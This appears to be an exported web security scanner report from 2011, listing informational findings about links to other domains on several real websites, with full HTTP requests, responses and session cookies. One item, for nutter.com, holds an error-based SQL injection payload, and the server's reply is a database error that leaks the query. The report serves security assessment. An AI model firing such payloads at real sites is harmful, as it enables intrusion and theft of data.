Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: WC_PERSISTENT=QolLt0HmGKtgnMXrHDVRUVhne1g%3d%0a%3b2011%2d06%2d16+08%3a15%3a45%2e967%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:19:13 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308230145967%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cOvVzEI6Oajqj7Z9XG6ty%2bZOWJoA%3d;Domain=.homedepot.com;Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xmlns="http://ww
...[SNIP]...
<script type="text/javascript" src="https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...
<li><a class="L3" href="http://www.homedepotgardenclub.com/Home.aspx?" onclick="javascript:findCategoryUrl('http://www.homedepotgardenclub.com/Home.aspx?');s_objectID=url4;return this.s_oc?this.s_oc(e):true">Garden Club</a>
...[SNIP]...
<li><a class="L3" href="http://www.homedepotgardenclub.com/Home.aspx" onclick="javascript:findCategoryUrl('http://www.homedepotgardenclub.com/Home.aspx');s_objectID=url4;return this.s_oc?this.s_oc(e):true">Garden Club</a>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=[Page ID];ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.google.com/afsonline/show_afs_ads.js"></script>
...[SNIP]...

15.106. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/Navigation

Issue detail

The page was loaded from a URL containing a query string:

http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556456&langId=-1&catalogId=10053&selectedCatgry=SEARCH%20ALL&navFlow=3&searchRedirect=lawn%20mower&Nu=P_PARENT_ID&locStoreNum=4501

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=[Page ID];ord=1?
http://www.homedepotgardenclub.com/Home.aspx
http://www.homedepotgardenclub.com/Home.aspx?
https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js

Request

Response

15.107. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The page was loaded from a URL containing a query string:

http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=[Page ID];ord=1?
http://www.homedepotgardenclub.com/Home.aspx
http://www.homedepotgardenclub.com/Home.aspx?
https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js

Request

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224033585%3a%3bC25%5fEXP%3d1360064033%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227633772%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2crM8xlAEyyjuzBc2ZPDgFJlhwFMM%3d

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:34:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:34:59 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224094066%3a%3bC25%5fEXP%3d1360064094%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:34:54 GMT;Path=/
Set-Cookie: THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1;Domain=.homedepot.com;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%222%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%243%2c798%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816094%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224094066%3a%3bC25%5fEXP%3d1360064094%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:34:54 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227694814%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cufvYdumw7ZxHWtTtpzjDpT0%2bqW0%3d;Domain=.homedepot.com;Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<script type="text/javascript" src="https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...
<li><a class="L3" href="http://www.homedepotgardenclub.com/Home.aspx?" onclick="javascript:findCategoryUrl('http://www.homedepotgardenclub.com/Home.aspx?');s_objectID=url4;return this.s_oc?this.s_oc(e):true">Garden Club</a>
...[SNIP]...
<li><a class="L3" href="http://www.homedepotgardenclub.com/Home.aspx" onclick="javascript:findCategoryUrl('http://www.homedepotgardenclub.com/Home.aspx');s_objectID=url4;return this.s_oc?this.s_oc(e):true">Garden Club</a>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=[Page ID];ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

15.108. http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/ProductDisplay

Issue detail

The page was loaded from a URL containing a query string:

http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay?langId=-1&storeId=10051&catalogId=10053&productId=202642971&R=202642971

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=[Page ID];ord=1?
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4be45b1c4534ac19
http://www.adobe.com/products/acrobat/readstep2.html
http://www.homedepotgardenclub.com/Home.aspx
http://www.homedepotgardenclub.com/Home.aspx?
https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:35:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:35:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224139234%3a%3bC25%5fEXP%3d1360064139%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:35:39 GMT;Path=/
Content-Length: 286445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xmlns="http:
...[SNIP]...
<script type="text/javascript" src="https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...
<li><a class="L3" href="http://www.homedepotgardenclub.com/Home.aspx?" onclick="javascript:findCategoryUrl('http://www.homedepotgardenclub.com/Home.aspx?');s_objectID=url4;return this.s_oc?this.s_oc(e):true">Garden Club</a>
...[SNIP]...
<li><a class="L3" href="http://www.homedepotgardenclub.com/Home.aspx" onclick="javascript:findCategoryUrl('http://www.homedepotgardenclub.com/Home.aspx');s_objectID=url4;return this.s_oc?this.s_oc(e):true">Garden Club</a>
...[SNIP]...
<div class="addthis_toolbox addthis_default_style"><a
                                       class="addthis_button_compact at300m"
                                       href="http://www.addthis.com/bookmark.php?v=250&username=xa-4be45b1c4534ac19"><span
                                       class="at300bs at15t_compact">
...[SNIP]...
</div>
                                   <script
                                       src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4be45b1c4534ac19"
                                       type="text/javascript"></script>
...[SNIP]...
<br>
                               <a href="http://www.adobe.com/products/acrobat/readstep2.html">Download</a>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=[Page ID];ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

15.109. http://www.lightsquared.com/wp-content/themes/lightsquared/js/lightsquared.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lightsquared.com
Path:	/wp-content/themes/lightsquared/js/lightsquared.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.lightsquared.com/wp-content/themes/lightsquared/js/lightsquared.js?ver=2.9.1

The response contains the following links to other domains:

http://i.ytimg.com/vi/"+image+"/default.jpg
http://www.executiveinterviews.net/players/mini/default.asp?order=U13386
http://www.youtube.com/embed/6mCkbrYKQyI
http://www.youtube.com/v/'+player+'&hl=en_US&fs=1&

Request

GET /wp-content/themes/lightsquared/js/lightsquared.js?ver=2.9.1 HTTP/1.1
Host: www.lightsquared.com
Proxy-Connection: keep-alive
Referer: http://www.lightsquared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o8lr5d4di75ipopo7a9ll7olo7

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 10:50:19 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 10 Jun 2011 18:07:08 GMT
ETag: "12e4471-3f78-4a55f7018eb00"
Accept-Ranges: bytes
Content-Length: 16248
Connection: close
Content-Type: application/x-javascript

/*var titillum = { src: '/wp-content/themes/lightsquared/swf/titilum.swf', wmode: 'transparent' };
sIFR.activate(titillum);
sIFR.replace(titillum, {
selector: '.side-column h2, .middle-column h2',

...[SNIP]...
huja-blus-29-jul-10-600K.flv';
   swfobject.embedSWF("/wp-content/themes/lightsquared/swf/vidPlayer650x406.swf", "flash_content", "650", "406", "9.0.0", "", flashvars);
   //jQuery("#flash_content").html('<iframe id="bloombergVid" style="height: 520px; width: 520px; pading: 0; margin: 0" src="http://www.executiveinterviews.net/players/mini/default.asp?order=U13386" frameborder=0>Your broswer does not support iframes</iframe>
...[SNIP]...
<div id="flash_content"><iframe title="YouTube video player" width="640" height="390" src="http://www.youtube.com/embed/6mCkbrYKQyI" frameborder="0" allowfullscreen></iframe>
...[SNIP]...
< 3; i++) {
   if(i==1){
       var player = entry.id;

       loadVideo(player);
   }
var entry = entries[i];
var title = entry.title;
   var image = entry.id;
   var player = entry.id;
   image = "<img src='http://i.ytimg.com/vi/"+image+"/default.jpg' title='"+title+"' alt='"+title+"' rel='"+player+"'/>";
html.push('<li>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/'+player+'&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="285" height="230"></embed>
...[SNIP]...

15.110. http://www.nutter.com/attorneys.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nutter.com
Path:	/attorneys.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.nutter.com/attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))

The response contains the following link to another domain:

http://www.macromedia.com/go/getflashplayer

Request

GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:41:12 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 22562

error: Duplicate entry '_!@4dilemma:0' for key 1 | 1062<BR>sql: SELECT FirstName,LastName FROM attorneys WHERE AttorneyID=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(6
...[SNIP]...
<div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a>
...[SNIP]...
<div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a>
...[SNIP]...

16. Cross-domain script include previous next
There are 92 instances of this issue:

http://a.rfihub.com/sed
http://a.tribalfusion.com/p.media/aMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d/2546166/adTag.html
http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7
http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3
http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.4
http://afe.specificclick.net/serve/v=5
http://afe.specificclick.net/serve/v=5
http://cas.criteo.com/delivery/afr.php
http://cdn5.tribalfusion.com/media/1956006/frame.html
http://cdn5.tribalfusion.com/media/2516896//frm.html
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1873985195@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1046746257@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1397195672@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1520590272@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1737549536@Top1
http://online.wsj.com/home-page
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=33615280/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=43472790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=46970102/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63221864/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63734715/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74200963/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74864635/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=75388116/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=76474621/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=83985251/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90208788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90827809/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=9352727/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=12937368/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
